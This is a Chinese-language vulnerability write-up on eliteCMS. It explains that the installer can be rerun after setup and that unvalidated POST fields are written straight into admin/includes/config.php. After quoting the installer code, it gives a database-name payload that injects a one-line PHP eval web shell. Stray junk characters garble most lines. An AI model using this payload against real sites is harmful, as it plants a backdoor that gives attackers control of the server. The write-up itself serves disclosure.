eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
/ Q2 b& _+ i& ?9 v t) C) D+ l+ y9 M# q7 z, s7 T4 E _
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php2 H5 @8 w* @) g1 B
我们来看代码:
, l# }5 [4 k M# A + P% V( V; T, m8 \" c
...8 w# W" f: ~, P& Y* w; i8 z5 S% J
elseif ($_GET['step'] == "4") {. t) c* I; @8 H# _" @
$file = "../admin/includes/config.php";0 w& V+ {, t8 J: L1 X2 Z4 S' f9 e( d
$write = "<?php\n";( Y2 z6 U& F' a6 P2 V5 F5 \; k: t
$write .= "/**\n";
6 u# A6 M# T2 p7 i# }- B: Z $write .= "*\n";
. x% f2 I4 P7 y# a# a2 P $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";& O1 u$ P1 x" M( W% }5 @# y
...略...9 a' D2 r$ H0 u2 s. [% z& }
$write .= "*\n";/ s; v/ [% S1 W' L4 M$ F/ ~
$write .= "*/\n";
$ W9 I$ n7 \) _6 o, K: z: Y $write .= "\n";
$ G9 V( y- `5 b1 B% T $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";8 M0 `, L9 ]7 Z+ p
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
( k& T+ b- g" n: p/ F( k $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
) F& j9 K3 }+ B $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
0 W6 c9 U0 m) v' [; z( ^. U $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
0 ^( w; }/ S* N/ B/ M2 t $write .= "if (!\$connection) {\n";; A* y. w9 p# S+ T+ r
$write .= " die(\"Database connection failed\" .mysql_error());\n";! @5 a$ x; B/ R9 x& J
$write .= " \n";$ n0 o# T1 [+ ?1 v. m$ F
$write .= "} \n";
6 f6 g" ?/ N8 m7 W& f: j- @ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
h- t" L- X0 T $write .= "if (!\$db_select) {\n";1 t; T1 w1 [" t
$write .= " die(\"Database select failed\" .mysql_error());\n";
. E* Q, f4 N4 j( I, f3 l1 y $write .= " \n";
2 A7 U" D: C6 A+ k/ V $write .= "} \n";
3 P5 D# K' f5 v4 d $write .= "?>\n";
6 e& ?; c" ]5 v, |
* | h5 M! |7 G: e( H: P $writer = fopen($file, 'w');0 A4 f1 H6 n8 B0 D! {6 a
... T# Q' T; A& j, g$ h$ m
& X9 [, u; p* n+ k在看代码:% r( z9 M# L3 s
' } ` \# x. X$ E" z$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];7 l! K. I3 G4 o8 T/ O
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];& O m% v! E* X
$_SESSION['DB_USER'] = $_POST['DB_USER'];
# O9 z6 |" W3 \, K$_SESSION['DB_PASS'] = $_POST['DB_PASS'];( b6 r/ f6 h6 z; `9 p% D
1 m) u- z; r; P0 G5 u( s! `
取值未作任何验证' B6 D T9 h; c2 K- M5 E2 r
如果将数据库名POST数据:" l* x2 ^- k' J/ i( J. Y
: T% X# P' I5 r( w5 W
"?><?php eval($_POST[c]);?><?php4 g6 q; u7 M% H5 q; r4 n% W
+ z' h, C8 _" d8 l' G将导致一句话后门写入/admin/includes/config.php8 R/ i5 {# {) _: D( b* B
|